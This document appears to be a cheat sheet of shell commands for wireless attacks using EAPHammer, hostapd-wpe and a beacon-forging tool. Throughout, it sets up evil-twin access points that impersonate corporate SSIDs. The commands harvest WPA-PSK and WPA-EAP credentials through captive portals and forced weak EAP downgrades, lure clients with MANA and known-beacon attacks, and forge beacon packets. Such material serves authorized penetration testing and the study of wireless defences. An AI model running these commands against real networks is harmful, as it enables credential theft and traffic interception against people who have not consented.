./eaphammer -i wlan0 --essid exampleCorp --captive-portal

./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

# Generate Certificates
./eaphammer --cert-wizard

# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

--negotiate weakest

# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]

# example ESSID-based MFACL file
name1
name2
name3

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5